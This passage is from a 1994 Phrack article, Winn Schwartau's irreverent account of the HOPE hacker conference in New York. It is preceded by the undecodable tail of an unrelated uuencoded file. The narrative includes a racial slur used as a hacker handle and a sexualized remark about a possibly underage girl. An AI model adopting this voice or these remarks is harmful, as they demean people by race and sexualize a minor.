MDG&*=[+4+%MG\GF)RQQG(:E35Y5;YD\SCN*2C<=[%F+6XY-O[I5'>K*ZA$[$5
|
|||
|
MHQ#8ZEL?SI\C0[E.;XS>#M>\+QW6H0,D\6H++>:>RAC,&B>,LF>OWE/)R-@Y;
|
|||
|
MS75>#?%S74:GP+XP2XA09_LK4\S(H'92W[R,?0FLZU*<-9K3^M3G4DW[IVMMG
|
|||
|
M\48K0K'XKT*XTO:>;J-?M5IQ_$67YD_$9]Z]"\->*YKW3X[S2-:AOK?')5_/`
|
|||
|
MBW=^<[A]">/2N-IPU1:U.CMO'L292\M\%3AV@<2!.,_,.&!Q@X`/6JU]8^!_-
|
|||
|
M%!ED>.R%Q(F)9(W-M<;1ZLI5\?C6T:T6K3(Y7?0^:/VB-%^$/ARSFMM`CFN-U
|
|||
|
M<D?[\.IR3!#WW[F8?AC-?._FX!R>17=0?,O+H0U8QKZX,\QYRHX%0>G;%>A%7
|
|||
|
M65C!ZL[#X:+AM9SQ_H!Q_P!]+7*W'RR$X'7TK*/QLO[)"V,9'2FULB"19MB!L
|
|||
|
M133,Q[XI6"XS)/>CI3$%%`!1TH`6CI0`4H6@#0TOP[J6K8-G9S2)W?;\H_'I+
|
|||
|
M7<Q^''T[PC::3?2KMN-0+R>6<<!/4CVKEKUHKW5N;TZ;W>Q/9Z5!9[!I5A&AM
|
|||
|
MZ^;R<_\``S_2G:5:W$EJ1).=BS2A$';YSG]2:YW*Z][5G0H\NB-"VB2$8"!6C
|
|||
|
M/<YY_&I?-D,A;?C/'RG%9^I=R1&8[01NQUW`4C%"26<?\"`XH`>UD#M==JX]]
|
|||
|
M<56DMY8Y.9'(/3!!%5%B9-&BA<ERQ]CBK$<4<JY\[!],=*H"/[&Q/RN7P>"I"
|
|||
|
M_P`:;C8P697#8X);M6B%L>+=*DAN);659897BD0Y5T;!4^H/:N]J^AYVQZ'XY
|
|||
|
M0_:"\5>&BD-Y*NK6HP"EQ]\#V?K^>:]&T'XJ>`_$=Y;744ESX6U0N1+<6\WDV
|
|||
|
M-RI_C7AN=OWA7DXC!RIOFI;=4=,)WWW/3[+Q/XTL(EN+.[T?Q;8L-R^9BWN&<
|
|||
|
M7L!(GR,?<BLKQE\8-"ET::S\2>&]:TF>12H66V6:(GV?(S^5<<(^T=X,J3MHS
|
|||
|
MSY?U6[MC>RFT>1XBQVED"'\@3BL>\NMJ$`\MTKV*<3.3LC-IR#+5T&2.M^'3^
|
|||
|
ME)]5YP#8,/\`QY:YZ1%*FL5I-FG0I8P#3:W,Q*.E`@Z4=*`%HQ0`9)-%`"XI8
|
|||
|
M\<+O]U2:!V.A\.^"_P"V''G78B7/W4C9S^>,#\S79:?X4\/:0R)]F-S./XI!.
|
|||
|
MO/Y8P/RKS\1B)WY(:';1H12YI&@T;,VZWMD5<XX&"/PXJIJJ.MSI%O+^\4RR0
|
|||
|
M2?/R>%(YK""L_,TFR^))(R0-NP<$`G^54=+F:.&5,D8N)#GC^]]/>FDK"+-S_
|
|||
|
M=/MVJ5'J#59;K9QY3$=SZ4U$&RU%L$(D52,]3G@#^E3+;(_2<`@YZ\_RHU0RR
|
|||
|
M9;2Y&2CHZ#NO;\Z>MI.TW$08X!P:5T*S+<>E[U8.NT@=#Q^E2VNC06Y65\,/?
|
|||
|
M0?UH4GT'9%F2TMG("R>7@9P^*Y[5]6M+,B&*19YB=JI%\Q)]\5K23D[$R:2/R
|
|||
|
M+KW0"6+6V`1SL)_E61+$\+E)%*,.H(KOISYCAG#E9&>*4'%6R34T?Q9KF@$MD
|
|||
|
MIFKWEGSDB*9E!^HZ'\:Z'4/C9XNU?1I-*U*]BO('&"TD*A_S&*YIX6G.7-:SF
|
|||
|
M+4VE8Y%]0E?/W5^E5\D\YK912);N)TI\?%,$=3X!)BN=01U*DV3'!&.ZD5SU[
|
|||
|
MQ)L)'N<5E'XV:;(K-POUIG2MC-A1TH$&,4=*`#%*!0!-:V5Q>2"*WADF?^ZBT
|
|||
|
MDFNITSX6ZK=();R2&SC/8G?)C_=''YD5A6KQI+7<VI4I5'H;-O\`#_1[`CSG1
|
|||
|
MGN).F)!A3^`YK:L-!$6(+'3HE3/.Y<UP5*\I[Z([(4HPV-JWN%>16E2)'
|
|||
|
MONA05./53G/TJ5);*SR(H4A!`#!@<Y_/'Z5COL:7)/W3G]TR[,Y&#TK-OD7_@
|
|||
|
M`(2C3U?!5(9&QGIV_K50(D6HHR)'1T+(QX)7I5+2[(2I<8=2?M,BX(.>M4G9_
|
|||
|
M:!:XLVG+YH4DC/;(R?PJ1-&AP$1G=F&0%7/\A3]HT+E0ZXTZ\T2X\N:*2*1=*
|
|||
|
MK;)(RIP1D<'VI(I#."X1E<G^#@?E5735Q&C#<M;*J2N0CCJ>@]C4HU?2K=VVP
|
|||
|
M7"2L"&9849CZ?P_7^50HMO0=TEJ3)J-S+N^RZ/*=O4SD1_IR:BNI+U(6DO;R+
|
|||
|
MVLT`Z0Q9/X$_X5:BD[/45^QST\?]NSB-7=HL_P"LGD/Z+_@*NPW.GZ'&;73K`
|
|||
|
M62ZO<_>*<"NG5KE1&VIQ4N8U+L"RYQ_A4<VFP:G"R,,''!`R0:2ERZHAJ^C.0
|
|||
|
M<U'P[=V`+A?-B'\2CI]169C%=<9J2NCFE%Q=F'2CI5$B=*.E`!TI5^N*!G2>T
|
|||
|
M!E8WMXHX)LWY^A4_TK!N1B8D\5E'XV6_A("<FC&*U,PQBC%`"A33XK>29PD:]
|
|||
|
M,[L<!5&2:-AI&YIW@35[X_-"+=1U\TX/Y=?SKJM'^'FEV:"2_62Z<=BV%'X#9
|
|||
|
M^IK@KXNWNT]SKI8:^LCH;6,&W:+2[1D2/^&%0J@_RJS;:;?W+JES=);@XPF[7
|
|||
|
M+-_+^M<.VLMSK]#<LM"M["3SFQ(%'(*[B?Y_RJ^;6&ZD`M7BCD//^IYQZ=OS`
|
|||
|
M%9.=W<=C2.D*^W*J%/!!SS52\\'64@SM:,$X*H#@5"FXO0;C<SYOAT73-I=%6
|
|||
|
M`<X#K_7_`.M7-:UH=W%XEM+&#+S6]FVYEP/X@,_K732JJ6YE.-K%6;3]7MYFO
|
|||
|
M!AF`'))4D8]>:9X<O[&'49X[S=<1+</OBC?;)TX8#/K^>*VT:T)-R>ZTBUG9>
|
|||
|
MK2[E>V&#F=!&R_D3FJ[ZGH]N2T+?;7G`"I&/,<'/;;QG\<^U1&$Y/W4-M16I#
|
|||
|
M6N-0O+@>3;:)>X0X_P!*81;?PZFH;?2M8=MT]W%:`G`6*,.?S;I^5:)1AH]25
|
|||
|
M+M[%V'0;6XQ+/=2WDBG.V=R1GZ=*T1+:Z:WEI;A.,8A'']*ER<M-BDDM3,U#Z
|
|||
|
MQD8W:UL8S+,<9PW`-5?[/-PR:AK=V7`^["&P/I@5K%<BOU(>IKV=A/J*[;:(`
|
|||
|
M6%IWV)AG]N:UK32K:PA*VT2QL/O-CEOSI.5M"DCS];13&"P4K],FFM:J4'E`H
|
|||
|
M+]:CF$5)2Z2E20<#FJ=UH.GWRN'MUC.<[HP`U:1FXZQ)<5+1G-:SX;?2HA.LW
|
|||
|
MRR0L<+D885DXQ7=3GSQN<DX\KL(%Q28Q^%:$ABCI0(ZCX<%?[<F$BED^QS<9!
|
|||
|
M]JY^[3-TRCU(_6LE\;-/LE?%+MQ6I`H2M/P]X<N/$>H+96LD22$9!D)`_0&HI
|
|||
|
MG-0BY/H5&/,[(]"T[X*V]JOF7]Z;E@`VQ`44#N,]3^E:]EI%IHY,5K;PQ``@Z
|
|||
|
ME%P3CU/?\:\6IBY5[I:(]*G05+5[EW2=-DUI1)'Y<49X4]\^XQ_6M.#P=;&`2
|
|||
|
M,[F5F!YD&1U].E9.7)H:;EL-!80^0(L%!DE>GX"JXG\R42/PZ'<K@9P/3%3JN
|
|||
|
M%C:M--C+1W3;MTK!"=YP<G'W>@JY>:8Z,0\D1A&!L\O)_P"^L^WI67-<NUBM$
|
|||
|
M'>R:/"QPC!FXPO3_`#ZU9MKZ6[C+2A#&5(V[3_CC'M1YA8U--B46J81(U!X\K
|
|||
|
MM=OOTKB&O?L?C_4I\9:*R"+Q_>D_^M6E)[D3Z',ZY\44:Z:T^S22.'PRE51'5
|
|||
|
M]B1DXK.?1;_4IVNE:TL$N'WD0;F)/OG`_2NR%)4DG+J92GSNR+</P_T_R7N)R
|
|||
|
M&DN"G)\PXS]`.*T-)GN-`9K?3I3;IC+*G"G/MTJW5<U8CD4=2U<:C>74D:7#H
|
|||
|
MK(X)P>GZXS21#SXRH[#O_P#6J-$AD<]Q%&LJE&4JI+$'/OQ6`+J;6IVAMI&MU
|
|||
|
MH1P3N)8CG_"M81ZLENVA;C%OIT0BL80LAX,DG))]:W=%\*0PD7%XPN93R`?NV
|
|||
|
DK]*<IN*OU81C<WEB"384D*!G;U%.GA<%2K#!)SG\JQB:`/_9Z
|
|||
|
``
|
|||
|
end
|
|||
|
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 23 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
Cyber Christ Bites The Big Apple
|
|||
|
HOPE - Hackers On Planet Earth,
|
|||
|
New York City - August 13-14, 1994
|
|||
|
(C) 1994 Winn Schwartau
|
|||
|
by Winn Schwartau
|
|||
|
|
|||
|
(This is Part II of the ongoing Cyber Christ series. Part I,
|
|||
|
"Cyber Christ Meets Lady Luck" DefCon II, Las Vegas, July 22-24,
|
|||
|
1994 is available all over the 'Net.)
|
|||
|
|
|||
|
Las Vegas is a miserable place, and with a nasty cold no less; it
|
|||
|
took me three weeks of inhaling salt water and sand at the beach
|
|||
|
to finally dry up the post nasal drip after my jaunt to DefCon
|
|||
|
II. My ears returned to normal so that I no longer had to answer
|
|||
|
every question with an old Jewish man's "Eh?" while fondling my
|
|||
|
lobes for better reception.
|
|||
|
|
|||
|
New York had to be better.
|
|||
|
|
|||
|
Emmanuel Goldstein -aka Eric Corely - or is it the other way
|
|||
|
around? is the host of HOPE, Hackers on Planet Earth, a celebra
|
|||
|
tion of his successfully publishing 2600 - The Hackers Quarterly
|
|||
|
for ten years without getting jailed, shot or worse. For as
|
|||
|
Congressman Ed Markey said to Eric/Emmanuel in a Congressional
|
|||
|
hearing last year, and I paraphrase, 2600 is no more than a
|
|||
|
handbook for hacking (comparable obviously to a terrorist hand
|
|||
|
book for blowing up the World Trade Center) for which Eric/Emman
|
|||
|
uel should be properly vilified, countenanced and then drawn and
|
|||
|
quartered on Letterman's Stupid Pet Tricks.
|
|||
|
|
|||
|
Ed and Eric/Emmanuel obviously have little room for negotiation
|
|||
|
and I frankly enjoyed watching their Congressional movie where
|
|||
|
communication was at a virtual standstill: and neither side
|
|||
|
understood the viewpoints or positions of the other.
|
|||
|
|
|||
|
But Ed is from Baaahhhsten, and Eric/Emmanuel is from New York,
|
|||
|
and HOPE will take place in the Hotel Filthadelphia, straight
|
|||
|
across the street from Pennsylvania Station in beautiful downtown
|
|||
|
fast-food-before-they-mug-you 34th street, right around the
|
|||
|
corner from clean-the-streets-its-Thanksgiving Herald Square.
|
|||
|
Geography notwithstanding, HOPE promised to be a more iconoclas
|
|||
|
tic gathering than that of DefCon II.
|
|||
|
|
|||
|
First off, to set the record straight, I am a New Yorker. No
|
|||
|
matter that I escaped in 1981 for the sunny beaches of California
|
|||
|
for 7 years, and then moved to the Great State of the Legally
|
|||
|
Stupid for four more (Tennessee); no matter that I now live on
|
|||
|
the Gulf Coast of Florida where the water temperature never dips
|
|||
|
below a chilly 98 degrees; I am and always will be a New Yorker.
|
|||
|
|
|||
|
It took me the better part of a decade of living away from New
|
|||
|
York to come to that undeniable and inescapable conclusion: Once
|
|||
|
a New Yorker, always a New Yorker. Not that that makes my wife
|
|||
|
any the happier.
|
|||
|
|
|||
|
"You are so rude. You love to argue. Confrontation is your
|
|||
|
middle name." Yeah, so what's your point?
|
|||
|
|
|||
|
You see, for a true New Yorker these aren't insults to be re-
|
|||
|
regurgitated at the mental moron who attempts to combat us in a
|
|||
|
battle of wits yet enters the ring unarmed; these are mere tru
|
|||
|
isms as seen by someone who views the world in black and white,
|
|||
|
not black, white and New York.
|
|||
|
|
|||
|
Case in point.
|
|||
|
|
|||
|
I used to commute into Manhattan from the Westchester County
|
|||
|
suburb of Ossining where I lived 47 feet from the walls of Sing
|
|||
|
Sing prison (no shit!). Overlooking the wide expanse of the
|
|||
|
Hudson River from my aerie several hundred feet above, the only
|
|||
|
disquieting aspect of that location were the enormously deafening
|
|||
|
thunderclaps which resounded a hundred and one times between the
|
|||
|
cliffs on either side of the river. Then there was the occasion
|
|||
|
al escapee-alarm from the prison. .
|
|||
|
|
|||
|
So, it was my daily New York regimen to take the 8:15 into the
|
|||
|
city. If the train's on time I'll get to work by nine . . .
|
|||
|
|
|||
|
Grand Central Station - the grand old landmark thankfully saved
|
|||
|
by the late Jackie O. - is the nexus for a few hundred million
|
|||
|
commuters who congregate in New York Shitty for no other reason
|
|||
|
that to collect a paycheck to afford blood pressure medicine.
|
|||
|
|
|||
|
You have to understand that New York is different. Imagine,
|
|||
|
picture in your mind: nothing is so endearing as to watch thou
|
|||
|
sands of briefcase carrying suits scrambling like ants in a Gary
|
|||
|
Larson cartoon for the nearest taxi, all the while greeting their
|
|||
|
neighbors with the prototypical New York G'day!
|
|||
|
|
|||
|
With both fists high in the air, middle fingers locked into erect
|
|||
|
prominence, a cacophonous chorus of "Good Fucking Morning"
|
|||
|
brightens the day of a true New Yorker. His bloodshot eyes
|
|||
|
instantly clear, the blood pressure sinks by 50% and already the
|
|||
|
first conflict of the day has been waged and won.
|
|||
|
|
|||
|
Welcome to the Big Apple, and remember never, ever, to say, "Have
|
|||
|
a Nice Day." Oh, no. Never.
|
|||
|
|
|||
|
So HOPE was bound to be radically different from Vegas's DefCon
|
|||
|
II, if only for the setting. But, I expected hard core. The
|
|||
|
European contingent will be there, as will Israel and South
|
|||
|
America and even the Far East. All told, I am told, 1000 or more
|
|||
|
are expected. And again, as at DefCon II, I am to speak, but
|
|||
|
Eric/Emmanuel never told me about what, when, or any of the other
|
|||
|
niceties that go along with this thing we call a schedule.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
God, I hate rushing.
|
|||
|
|
|||
|
Leaving Vienna at 3:15 for a 4PM Amtrak "put your life in their
|
|||
|
hands" three hour trip to New York is not for the faint of heart.
|
|||
|
My rented Hyundai four cylinder limousine wound up like a sewing
|
|||
|
machine to 9,600 RPM and hydroplaned the bone dry route 66 into
|
|||
|
the pot holed, traffic hell of Friday afternoon Washington, DC.
|
|||
|
Twelve minutes to spare.
|
|||
|
|
|||
|
I made the 23 mile trip is something less than three minutes and
|
|||
|
bounded into the Budget rental return, decelerated to impulse
|
|||
|
power and let my brick and lead filled suitcase drop to the
|
|||
|
pavement with a dent and a thud. "Send me the bill," I hollered
|
|||
|
at the attendant. Never mind that Budget doesn't offer express
|
|||
|
service like real car rental companies. "Just send me the bill!"
|
|||
|
and I was off.
|
|||
|
|
|||
|
Eight minute to spare. Schlepp, schlepp. Heavy, heavy.
|
|||
|
|
|||
|
Holy shit! Look at the line for tickets and I had reservations.
|
|||
|
|
|||
|
"Is this the line for the four o'clock to New York?" Pant,
|
|||
|
breathless.
|
|||
|
|
|||
|
"Yeah." She never looked up.
|
|||
|
|
|||
|
"Will they hold the train?"
|
|||
|
|
|||
|
"No." A resoundingly rude no at that. Panic gene takes over.
|
|||
|
|
|||
|
"What about the self-ticketing computer?" I said pointing at the
|
|||
|
self ticketing computer.
|
|||
|
|
|||
|
"Do you have a reservation?"
|
|||
|
|
|||
|
"Yup." Maybe there is a God.
|
|||
|
|
|||
|
"Won't help you."
|
|||
|
|
|||
|
"What?"
|
|||
|
|
|||
|
Nothing.
|
|||
|
|
|||
|
"What do you mean won't help?"
|
|||
|
|
|||
|
"Computer's broken." Criminy! I have 4 minutes and here's this
|
|||
|
over-paid over-attituded Amtrak employee who thinks she's the
|
|||
|
echo of Whoopi Goldberg. "The line's over there."
|
|||
|
|
|||
|
Have you ever begged? I mean really begged? Well I have.
|
|||
|
|
|||
|
"Are you waiting for the four?" "Can I slip ahead?" "Are you in
|
|||
|
a death defying hurry?" "I'll give you a dime for your spot in
|
|||
|
line." "You are so pretty for 76, ma'am. Can I sneak ahead?"
|
|||
|
|
|||
|
Tears work. Two excruciating minutes to go. I bounced ahead of
|
|||
|
everyone in a line the length of the Great Wall of China, got my
|
|||
|
tickets and tore ass through Union Station The closing gate
|
|||
|
missed me but caught the suitcase costing me yet more time as I
|
|||
|
attempted to disgorge my now-shattered valise from the fork-lift-
|
|||
|
like spikes which protect the trains from late-coming commuters.
|
|||
|
The rubber edged doors on the train itself were kinder and gen
|
|||
|
tler, but at this point, screw it. It was Evian and Fritos for
|
|||
|
the next three hours.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
Promises tend to be lies. The check is in the mail; Dan Quayle
|
|||
|
will learn to spell; I won't raise taxes. I wonder about HOPE.
|
|||
|
|
|||
|
"It's going to be Bust Central," said one prominent hacker who
|
|||
|
threatened me with electronic assassination if I used his name.
|
|||
|
"Emmanuel will kill me." Apparently the authorities-who-be are
|
|||
|
going to be there in force. "They want to see if Corrupt or any
|
|||
|
of the MoD crew stay after dark, then Zap! Back to jail. (gig
|
|||
|
gle, giggle.) I want to see that."
|
|||
|
|
|||
|
Will Mitnick show up? I'd like to talk to that boy. A thousand
|
|||
|
hackers in one place and Eric/Emmanuel egging on the Feds to do
|
|||
|
something stupid. Agent Steal will be there, or registered at
|
|||
|
least, and half of the folks I know going are using aliases.
|
|||
|
|
|||
|
"I'd like a room please."
|
|||
|
|
|||
|
"Yessir. Name?"
|
|||
|
|
|||
|
"Monkey Meat."
|
|||
|
|
|||
|
"Is that your first or last name?"
|
|||
|
|
|||
|
"First."
|
|||
|
|
|||
|
"Last name?"
|
|||
|
|
|||
|
"Dilithium Crystal."
|
|||
|
|
|||
|
"Could you spell that?"
|
|||
|
|
|||
|
Now: I know the Hotel Pennsylvania. It used to be the high
|
|||
|
class Statler Hilton until Mr. Hilton himself decided that the
|
|||
|
place was beyond hope. "Sell it or scuttle it." They sold and
|
|||
|
thus begat the hotel Filthadelphia. I stayed here once in 1989
|
|||
|
and it was a cesspool then. I wondered why the Farsi-fluent
|
|||
|
bellhop wouldn't tell me how bad the damage was from the fire
|
|||
|
bombed 12th floor. The carpets were the same dingy, once upon a
|
|||
|
time colorful, drab as I remembered. And, I always have a bit of
|
|||
|
trouble with a hotel who puts a security check by the elevator
|
|||
|
bank. Gives you the warm and fuzzies that make you want to come
|
|||
|
back right away.
|
|||
|
|
|||
|
I saved $2 because none of the bell hops noticed I needed help,
|
|||
|
but then again, it wouldn't have mattered for there was no way he
|
|||
|
and I and my luggage were going to fit inside of what the hotel
|
|||
|
euphemistically refers to as a 'room'. Closet would be kind but
|
|||
|
still inaccurate. I think the word, ah, '$95 a night slum' might
|
|||
|
still be overly generous. Let's try . . . ah ha! the room that
|
|||
|
almost survived the fire bombing. Yeah, that's the ticket.
|
|||
|
|
|||
|
The walls were pealing. Long strips of yellowed antique wall
|
|||
|
paper embellished the flatness of the walls as they curled to
|
|||
|
wards the floor and windows. The chunks of dried glue decorated
|
|||
|
the pastel gray with texture and the water stains from I know not
|
|||
|
where slithered their way to the soggy carpet in fractal pat
|
|||
|
terned rivulets. I stood in awe at early funk motif that the
|
|||
|
Hotel Filthadelphia chose in honor of my attendance at HOPE.
|
|||
|
But, no matter how bad my room was, at least it was bachelor
|
|||
|
clean. (Ask your significant other what that means. . .)
|
|||
|
|
|||
|
In one hacker's room no bigger than mine I counted 13 sleeping
|
|||
|
bags lying amongst the growing mold at the intersection of the
|
|||
|
drenched wallboard and putrefying carpet shreds. (God, I love
|
|||
|
going to hacker conferences! It's not that I like Hyatt's and
|
|||
|
Hilton' all that much: I do prefer the smaller facilities, but, I
|
|||
|
am sad to admit, clean counts at my age.). My nose did not have
|
|||
|
to venture towards the floor to be aware that the Hotel Filtha
|
|||
|
delphia was engaging in top secret exobiological government
|
|||
|
experiments bent on determining their communicability and infec
|
|||
|
tion factor.
|
|||
|
|
|||
|
The top floor of the Hotel Filthadelphia - the 18th - was the
|
|||
|
place for HOPE, except the elevator door wouldn't open. The
|
|||
|
inner door did, but even with the combined strength of my person
|
|||
|
al crowbar (a New York defensive measure only; I never use it at
|
|||
|
home) and three roughians with a bad case of Mexican Claustropho
|
|||
|
bia, we never got the door open.
|
|||
|
|
|||
|
The guard in the lobby was a big help.
|
|||
|
|
|||
|
"Try again."
|
|||
|
|
|||
|
Damned if he didn't know his elevators and I emerged into the
|
|||
|
pre-HOPE chaos of preparing for a conference.
|
|||
|
|
|||
|
About 100 hackers lounged around in varying forms of disarray -
|
|||
|
Hey Rop!
|
|||
|
|
|||
|
Rop Gongrijjp editor of the Dutch Hacktic is a both a friend and
|
|||
|
an occasional source of stimulating argument. Smart as a whip, I
|
|||
|
don't always agree with him, though, the above-ground security
|
|||
|
types ought to talk to him for a clear, concise and coherent
|
|||
|
description of the whys and wherefores of hacking.
|
|||
|
|
|||
|
Hey Emmanuel! Hey Strat! Hey Garbage Heap! Hey Erikb! Hey to
|
|||
|
lots of folks. Is that you Supernigger? And Julio? I was sur
|
|||
|
prised. I knew a lot more of these guys that I thought I did.
|
|||
|
Some indicted, some unindicted, some mere sympathizers and other
|
|||
|
techno-freaks who enjoy a weekend with other techno-freaks.
|
|||
|
Security dudes - get hip! Contact your local hacker and make
|
|||
|
friends. You'll be glad you did.
|
|||
|
|
|||
|
>From behind - got me. My adrenaline went into super-saturated
|
|||
|
mode as I was grabbed. I turned and it was . . . Ben. Ben is a
|
|||
|
hugger. "I just wanted to hug you," he said sweetly but without
|
|||
|
the humorous sexually deviant connotation that occurred during
|
|||
|
Novocain's offer to let Phil Zimmerman sleep with him in Las
|
|||
|
Vegas.
|
|||
|
|
|||
|
I smiled a crooked smile. "Yeah, right." Woodstock '94 was a
|
|||
|
mere 120 miles away . . .maybe there was a psychic connection.
|
|||
|
But Ben was being sincere. He was hugging everyone. Everyone.
|
|||
|
At 17, he really believes that hugging and hacking are next to
|
|||
|
Godliness. Boy does he have surprise coming the first time his
|
|||
|
mortgage is late. Keep hugging while you have the chance, Ben.
|
|||
|
|
|||
|
Assorted cases of Zima (the disgusting Polish is-this-really-lime
|
|||
|
flavored beer of choice by those without taste buds) appeared,
|
|||
|
but anyone over the age of 21 drank Bud. What about the 12 year
|
|||
|
olds drinking? And the 18 year olds? And the 16 year olds?
|
|||
|
|
|||
|
"Rop, I don't think you need to give the hotel an excuse to bust
|
|||
|
you guys outta here." Me, fatherly and responsible? Stranger
|
|||
|
things have happened. The beer was gone. I'm not a teetotaler,
|
|||
|
but I didn't want my weekend going up in flames because of some
|
|||
|
trashed 16 year old puking on an Irani ambassador in the lobby.
|
|||
|
No reason to test fate.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
Nothing worked, but that's normal.
|
|||
|
|
|||
|
Rop had set up HEU (Hacking at the End of the Universe) in
|
|||
|
Holland last year with a single length of 800m ethernet. (That's
|
|||
|
meter for the Americans: about 2625 ft.) HOPE, though was dif
|
|||
|
ferent. The Hotel Filthadelphia's switchboard and phone systems
|
|||
|
crashed every half hour or so which doesn't do a lot for the
|
|||
|
health of 28.8 slip lines.
|
|||
|
|
|||
|
The object of the exercise was seemingly simple: plug together
|
|||
|
about 20 terminals into a terminal server connected to Hope.Com
|
|||
|
and let 'em go at it. Provide 'net access and, to the lucky
|
|||
|
winner of the crack-the-hopenet server (root) the keys to a 1994
|
|||
|
Corvette!
|
|||
|
|
|||
|
You heard it right! For breaking into root of their allegedly
|
|||
|
secure server, the folks at 2600 are giving away keys to a 1994
|
|||
|
Corvette. They don't know where the car is, just the keys. But
|
|||
|
they will give you the car's last known location . . . or was it
|
|||
|
$50 in cash?
|
|||
|
|
|||
|
Erikb - Chris Goggans - showed up late Friday night in disguise:
|
|||
|
a baseball cap over his nearly waist length dirty blond hair.
|
|||
|
"He's here!" one could hear being muttered. "He had the balls to
|
|||
|
show up!" "He's gonna get his ass kicked to a pulp." "So you
|
|||
|
did come . . . I was afraid they'd intimidated you to stay in
|
|||
|
Texas."
|
|||
|
|
|||
|
No way! "Why tell the enemy what your plans are." Even the 50's-
|
|||
|
something ex-amphetamine-dealer turned reseller of public-records
|
|||
|
Bootleg didn't know Goggans was going to be there. But the
|
|||
|
multiple fans of Erikb, (a strong resemblance to Cyber Christ if
|
|||
|
he do say so himself) were a-mighty proud to see him.
|
|||
|
|
|||
|
This stunning Asian girl with skin too soft to touch (maybe she
|
|||
|
was 14, maybe she was 25) looked at Erikb by the message board.
|
|||
|
"You're," she pointed in disbelief "Erikb?" Chris nods, getting
|
|||
|
arrogantly used to the respectful adulation. Yeah, that's me, to
|
|||
|
which the lady/girl/woman instantly replied, "You're such an
|
|||
|
asshole." Smile, wide smile, hug, kiss, big kiss. Erikb revels
|
|||
|
in the attention and hundreds of horny hackers jealously look on.
|
|||
|
|
|||
|
Friday night was more of an experience - a Baba Ram Dass-like Be
|
|||
|
Here Now experience - with mellow being the operative word. The
|
|||
|
hotel had apparently sacrificed 20,000 square feet of its pent
|
|||
|
house to hackers, but it was obvious to see they really didn't
|
|||
|
give a damn if the whole floor got trashed. Ceiling panels
|
|||
|
dripped from their 12 foot lofts making a scorched Shuttle under
|
|||
|
belly look pristine. What a cesspool! I swear nothing had been
|
|||
|
done to the decorative environs since the day Kennedy was shot.
|
|||
|
But kudos to Emmanuel for finding a centrally located cesspool
|
|||
|
that undoubtedly gave him one hell of a deal. I think it would be
|
|||
|
a big mistake to hold a hacker conference at the Plaza or some
|
|||
|
such snooty overly-self-indulgent denizen of the rich.
|
|||
|
|
|||
|
Filth sort of lends credibility to an event that otherwise seeks
|
|||
|
notoriety.
|
|||
|
|
|||
|
I didn't want to take up too much of Emmanuel's and Rop's time -
|
|||
|
they were in setup panic - so it was off to the netherworld until
|
|||
|
noon. That's when a civilized Con begins.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
I dared to go outside; it was about 11AM and I was in search of
|
|||
|
the perfect New York breakfast: a greasy spoon that serves coffee
|
|||
|
as tough as tree bark and a catatonia inducing egg and bacon
|
|||
|
sandwich. Munch, munch, munch on that coffee.
|
|||
|
|
|||
|
I'd forgotten how many beggars hang out on the corner of 33rd and
|
|||
|
7th, all armed with the same words, "how about a handout, Winn?"
|
|||
|
How the hell do they know my name? "Whatever you give will come
|
|||
|
back to you double and triple . . . please man, I gotta eat." It
|
|||
|
is sad, but John Paul Getty I ain't.
|
|||
|
|
|||
|
As I munched on my coffee and sipped my runny egg-sandwich I
|
|||
|
noticed that right in front of the runny-egg-sandwich place sat a
|
|||
|
Ford Econoline van. Nice van. Nice phone company van. What are
|
|||
|
they doing here? Oh, yeah, the hackers need lines and the switch
|
|||
|
board is down. Of course, the phone company is here. But,
|
|||
|
what's that? Hello? A Hacker playing in the phone van? I recog
|
|||
|
nize you! You work with Emmanuel. How? He's robbing it. Not
|
|||
|
robbing, maybe borrowing.
|
|||
|
|
|||
|
The ersatz telephone van could have fooled anyone - even me, a
|
|||
|
color blind quasi-techno-weanie to yell "Yo! Ma Bell!" But, upon
|
|||
|
not-too-closer inspection, the TPC (The Phone Company) van was in
|
|||
|
fact a 2600 van - straight from the minds of Emmanuel and
|
|||
|
friends. Impeccable! The telephone bell in a circle logo is, in
|
|||
|
this case, connected via cable to a hacker at a keyboard. The
|
|||
|
commercial plates add an additional air of respectability to the
|
|||
|
whole image. It works.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
Up to HOPE - egg sandwich and all.
|
|||
|
|
|||
|
The keynote speech was to be provided courtesy of the Man in
|
|||
|
Blue. Scheduled for noon, things were getting off to a late
|
|||
|
start. The media (who were there in droves, eat your heart out
|
|||
|
CSI) converged on the MIB to see who and why someone of his
|
|||
|
stature would (gasp!) appear/speak at a funky-downtown hotel
|
|||
|
filled with the scourges of Cyberspace. I didn't see if Ben
|
|||
|
hugged the MIB, but I would understand if he didn't. Few people
|
|||
|
knew him or suspected what size of Jim-Carey-MASK arsenal might
|
|||
|
suddenly appear if a passive hug were accidentally interpreted as
|
|||
|
being too aggressive. The MIB is imposing and Ben too shy.
|
|||
|
|
|||
|
The media can ask some dumb questions and write some dumb arti
|
|||
|
cles because they spend 12 1/2 minutes trying to understand an
|
|||
|
entire culture. Can't do that fellows!
|
|||
|
|
|||
|
The MIB, though, knows hackers and is learning about them more
|
|||
|
and more; and since he is respectable, the media asks him about
|
|||
|
hackers. What are hackers? Why are YOU here, Mr. MIB?
|
|||
|
|
|||
|
"Because they have a lot to offer. They are the future," the Man
|
|||
|
In Blue said over and over. Interview after interview - how time
|
|||
|
flies when you're having fun - and the lights and cameras are
|
|||
|
rolling from NBC and PIX and CNN and assorted other channels and
|
|||
|
magazines. At 12:55 chaos had not settled down to regimented
|
|||
|
disorganization and the MIB was getting antsy. After all, he was
|
|||
|
a military man and 55 minutes off schedule: Egad! Take charge.
|
|||
|
|
|||
|
The MIB stood on a chair and hollered to the 700+ hacker phreaks
|
|||
|
in the demonstration ballroom, "Hey! It's starting. Let's go the
|
|||
|
theater and get rocking! Follow me." He leaned over to me: "Do
|
|||
|
you know where the room is?"
|
|||
|
|
|||
|
"Sure, follow me."
|
|||
|
|
|||
|
"Everyone follow, c'mon," yelled the MIB. "I'm going to get
|
|||
|
started in exactly three minutes," and three minutes he meant.
|
|||
|
Despite the fact that I got lost in a hallway and had hundreds of
|
|||
|
followers following my missteps and the MIB yelling at me for
|
|||
|
getting lost in a room with only two doors, we did make the main
|
|||
|
